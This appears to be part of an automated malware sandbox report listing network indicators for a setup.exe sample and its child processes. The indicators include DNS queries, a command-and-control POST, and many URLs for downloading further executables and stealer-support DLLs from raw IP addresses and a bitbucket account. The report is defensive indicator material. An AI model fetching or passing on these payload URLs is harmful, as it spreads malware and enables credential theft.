Source: global traffic	DNS traffic detected: DNS query: www.rapidfilestorage.com
Source: global traffic	DNS traffic detected: DNS query: service-domain.xyz
Source: global traffic	DNS traffic detected: DNS query: helsinki-dtc.com
Source: global traffic	DNS traffic detected: DNS query: skrptfiles.tracemonitors.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api2.check-data.xyz

Source: unknown

HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 5.42.99.177

Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663858000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.133.27/download/123p.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663858000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.133.27/download/123p.exey
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.133.27/download/th/space.php
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663858000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.80/riana/super.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.80/riana/super.exekD
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.80/riana/super.exenD
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exeAppData
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000AA6000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exepera
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exew$
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.78.242.100/d/525403
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.78.242.100/d/525403.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.78.242.100/d/525403com
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.78.242.100/d/525403e
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.78.242.100/d/525403pD
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dllq
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll#
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dlli
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.00000216655EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.00000216655EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://download.wondershare.com/inst/NetFxLite.exe
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe	String found in binary or memory: http://download.wondershare.net/cbs_down/filmora-idco_64b
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://download.wondershare.net/cbs_down/filmora-idco_64bit_full1901.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.00000216655EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.000000000112B000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000000.2311905117.00000000013CD000.00000080.00000001.01000000.00000009.sdmp	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.000000000112B000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000000.2311905117.00000000013CD000.00000080.00000001.01000000.00000009.sdmp	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.000000000112B000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000000.2311905117.00000000013CD000.00000080.00000001.01000000.00000009.sdmp	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://platform.wondershare.cc
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe	String found in binary or memory: http://pop.wondershare.com/filmora-licen
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://pop.wondershare.com/filmora-license.html
Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2338059167.0000000002018000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2317040458.0000000002340000.00000004.00001000.00020000.00000000.sdmp, H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000002.3354535955.0000000002011000.00000004.00001000.00020000.00000000.sdmp, H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2317139056.0000000002011000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mpegla.com
Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2338059167.0000000002018000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: H1pBxuA3W1wJGbhYT2DZXaLH.exe, 00000008.00000003.2338059167.0000000002018000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2674787069.000000001D528000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2716231663.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmp, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000003.2398678029.0000000001880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmp, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000003.2398678029.0000000001880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/385137/setup.exe
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/385137/setup.exe63088394404/
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/385137/setup.exeJP
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/385137/setup.exeLPl
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.884736279.xyz/J
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.tiktok.com
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663F75000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.00000216638A6000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265378882.0000021663811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.vk.com
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234494208.0000021663814000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2236018116.0000021663817000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663814000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/FPj
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234494208.0000021663814000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/H
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2246633217.0000021663CB2000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225453187.0000021663E45000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221188160.0000021663CAF000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264867017.0000021663C9F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2220641636.0000021663CAE000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234508442.0000021663802000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264586563.0000021663CB0000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2225717461.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663891000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221237990.0000021663E45000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2244661366.0000021663CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/67e8095f-ddaa-
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/hkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/v
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2212265415.000002166383D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/m/v
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/sdgdf/fbghhj/downloads/streamer.exe
